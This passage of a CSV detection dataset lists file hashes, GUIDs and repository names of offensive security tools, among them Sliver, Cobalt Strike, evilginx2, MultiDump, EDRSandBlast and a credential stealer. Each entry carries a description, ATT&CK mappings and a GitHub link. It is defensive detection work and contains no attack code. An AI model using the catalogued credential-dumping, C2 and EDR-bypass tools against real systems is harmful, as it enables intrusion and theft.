T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7c9a67abf328fddbc0cac8484a4f40f0c10e4b9b1cc3d4da6504df1303d7bdc0*",".{0,1000}7c9a67abf328fddbc0cac8484a4f40f0c10e4b9b1cc3d4da6504df1303d7bdc0.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*7cb004e20f6509f08f6e7b33778f973378c8a8e3c8cc4530cacf1f02fee3c29a*",".{0,1000}7cb004e20f6509f08f6e7b33778f973378c8a8e3c8cc4530cacf1f02fee3c29a.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*7cc2ba97a45b159405891baba5ac216334e89d878a4efcdf47492c284cc6342e*",".{0,1000}7cc2ba97a45b159405891baba5ac216334e89d878a4efcdf47492c284cc6342e.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*7cda14dc04bb731f09880db6310c9d9d4ee96176931627f322ec725cde6bd18b*",".{0,1000}7cda14dc04bb731f09880db6310c9d9d4ee96176931627f322ec725cde6bd18b.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*7ce3b3c16cdaa2dfae51fbcf163ac75947127a9fd5e2d3c588480e3629345e8f*",".{0,1000}7ce3b3c16cdaa2dfae51fbcf163ac75947127a9fd5e2d3c588480e3629345e8f.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*7ce9ff1b4f75bf4289a2f1a1c33bef9719109712019989d28c14b51703b973fc*",".{0,1000}7ce9ff1b4f75bf4289a2f1a1c33bef9719109712019989d28c14b51703b973fc.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*7CEC7793-3E22-455B-9E88-94B8D1A8F78D*",".{0,1000}7CEC7793\-3E22\-455B\-9E88\-94B8D1A8F78D.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*7CFC52.dll*",".{0,1000}7CFC52\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*7CFC52CD3F.dll*",".{0,1000}7CFC52CD3F\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*7d2a12270debccf539db741714c724d3bf88d9814e3056533ba2c712c71b0ef3*",".{0,1000}7d2a12270debccf539db741714c724d3bf88d9814e3056533ba2c712c71b0ef3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*7d573a4e6b5f9864b7de3e769d2154d8a38119656b0900ab6e93f44f46ad2fbe*",".{0,1000}7d573a4e6b5f9864b7de3e769d2154d8a38119656b0900ab6e93f44f46ad2fbe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7db43d94124a60b25347cddbba96109399cba1df3d4b7231d032888e4c2ae061*",".{0,1000}7db43d94124a60b25347cddbba96109399cba1df3d4b7231d032888e4c2ae061.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7dc9dc828a34eddb7080c9f01c7d6a7ceb6d4f4c876eb48191e741a6af21aa2b*",".{0,1000}7dc9dc828a34eddb7080c9f01c7d6a7ceb6d4f4c876eb48191e741a6af21aa2b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*7de9505c6a9be2ff8b308140d28e9318a6045529f70a48bd7ce4115d263988cb*",".{0,1000}7de9505c6a9be2ff8b308140d28e9318a6045529f70a48bd7ce4115d263988cb.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A" "*7e3763413eb0fd5cd4a0e4d9c90e37cc7325ba05ffec2487fd32a3a7ec0e8137*",".{0,1000}7e3763413eb0fd5cd4a0e4d9c90e37cc7325ba05ffec2487fd32a3a7ec0e8137.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*",".{0,1000}7E3E2ECE\-D1EB\-43C6\-8C83\-B52B7571954B.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*",".{0,1000}7E3E2ECE\-D1EB\-43C6\-8C83\-B52B7571954B.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*7E47D586-DDC6-4382-848C-5CF0798084E1*",".{0,1000}7E47D586\-DDC6\-4382\-848C\-5CF0798084E1.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*7e54ae9d348b3235d8582789274b78d92907907478efc94939204fe62921e1c7*",".{0,1000}7e54ae9d348b3235d8582789274b78d92907907478efc94939204fe62921e1c7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7e6b9406c2a12c93a7c56e4e2c79dd4eb1e562c772aef13ebd006abb727a2854*",".{0,1000}7e6b9406c2a12c93a7c56e4e2c79dd4eb1e562c772aef13ebd006abb727a2854.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*7E9729AA-4CF2-4D0A-8183-7FB7CE7A5B1A*",".{0,1000}7E9729AA\-4CF2\-4D0A\-8183\-7FB7CE7A5B1A.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","546","57","2024-01-08T09:38:34Z","2023-01-12T21:01:52Z" "*7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6*",".{0,1000}7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6*",".{0,1000}7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6*",".{0,1000}7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6*",".{0,1000}7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6*",".{0,1000}7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6*",".{0,1000}7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6*",".{0,1000}7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6*",".{0,1000}7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6*",".{0,1000}7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7EE536AE-6C1D-4881-88F7-37C8F2A0CA50*",".{0,1000}7EE536AE\-6C1D\-4881\-88F7\-37C8F2A0CA50.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*7etsuo/ShellServe*",".{0,1000}7etsuo\/ShellServe.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","1","N/A","6","1","N/A","N/A","N/A","N/A" "*7f0b1f1e301cdf0058203bbaee22dae51f023e73409ac60278da05cfa0fa7a23*",".{0,1000}7f0b1f1e301cdf0058203bbaee22dae51f023e73409ac60278da05cfa0fa7a23.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7f2b0703267297d62119fe11c3f8846f9fafa906b6da577e4480f5fc4914c3e1*",".{0,1000}7f2b0703267297d62119fe11c3f8846f9fafa906b6da577e4480f5fc4914c3e1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7f4cb93deb3d53403cc8f23e7d07ad8a8ff7c327ba9362eeb330e5489649da8e*",".{0,1000}7f4cb93deb3d53403cc8f23e7d07ad8a8ff7c327ba9362eeb330e5489649da8e.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*7f5ac429cd84d6ac935855b8a7656b830a6eefa1884f7fddd8c7c893c6b09ca4*",".{0,1000}7f5ac429cd84d6ac935855b8a7656b830a6eefa1884f7fddd8c7c893c6b09ca4.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*7f64f0074988005bfda114e773e9cfcd9fe700f37c779105205153430d514ab6*",".{0,1000}7f64f0074988005bfda114e773e9cfcd9fe700f37c779105205153430d514ab6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7f861f80620136ae0418cecf780c0c4896b4e7b8763cbaa232104ec7b99acdf5*",".{0,1000}7f861f80620136ae0418cecf780c0c4896b4e7b8763cbaa232104ec7b99acdf5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7f9d8f3147127bd0bbce2ac04a05747ca2a7ce962c2584b5be197ee75fcad18c*",".{0,1000}7f9d8f3147127bd0bbce2ac04a05747ca2a7ce962c2584b5be197ee75fcad18c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation 